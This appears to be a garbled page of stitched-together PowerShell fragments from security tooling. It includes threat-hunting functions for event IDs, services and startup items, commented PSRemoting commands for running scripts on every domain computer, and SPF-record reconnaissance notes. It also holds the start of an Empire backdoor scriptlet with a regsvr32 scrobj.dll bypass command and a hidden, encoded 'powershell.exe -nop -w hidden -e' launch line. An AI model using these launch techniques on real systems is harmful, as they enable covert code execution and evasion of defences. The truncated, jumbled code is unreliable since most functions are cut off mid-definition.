# Author: Alexander Leary | |
#-------------------------------------------------------------------------------- | |
# Add-ObjectWMI | |
#-------------------------------------------------------------------------------- | |
Function local:Add-ObjectWMI{ | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, | |
ValueFromPipelineByPropertyName=$true, HelpMessage="Name")] | |
[string]$Name = "", |
$allusersstartuP = Invoke-Command -Session (Get-PSSession) -ScriptBlock {Get-childItem "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs\StartUp\" | select fullname} |
function Invoke-HuntEvents { | |
# Set event ids | |
$x = "4768,4662,1917,216,8224,20001,106,4720,4732" | |
# Parse into list | |
$y = $x.Split(',') | |
# Look up events |
Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
# This can be run against all active PSRemoting sessions |
Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
# This can be run against all active PSRemoting sessions |
# Use this with PowerShell remote sessions | |
# New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user | |
# cd RemoteADS: | |
# Get-ADComputer -Filter * -Properties name | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession | |
# Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
# $Results = Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
# $ScriptBlock = "ps code" | |
# Invoke-Command -Session (Get-PSSession) -ScriptBlock {$ScriptBlock} | |
# Invoke-Command -Session (Get-PSSession) -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
# $Results | Export-Csv -Notypeinformation results.csv |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Empire" | |
progid="Empire" | |
version="1.00" | |
classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
> | |
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
#$results = Expand-SpfRecord -domain netspi.com -RecurseInclude | |
#$results | select spfrecord | foreach {$_.spfrecord -split(" ")} | |
# need to handle the variables - they currently cause errors | |
# Need to parse IP ranges and check for owners; check whether they can be bought, or whether something in the range can be bought | |
# Need to parse domains and check whether any are expired. | |
<#PSScriptInfo | |
.VERSION 0.9.0 | |
.GUID 16e3e002-a6d7-4130-b599-5dd23438d194 | |
.AUTHOR Cory Calahan |
<# | |
# Invoke-SPFCrawl Outline | |
# check out: | |
https://github.com/pushsecurity/saas-attacks/blob/main/techniques/dns_reconnaissance/description.md | |
https://github.com/BishopFox/SpoofcheckSelfTest | |
https://github.com/binaryfigments/emaildefense - checks SPF, DMARC, DKIM, authenticated data, TLSA, DANE; does not flatten, and provides no owner or other lookup info | |
- https://pkg.go.dev/github.com/binaryfigments/emaildefense | |
https://github.com/GlobalCyberAlliance/GCADMARCRiskScanner |
powershell.exe -nop -w hidden -e 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 |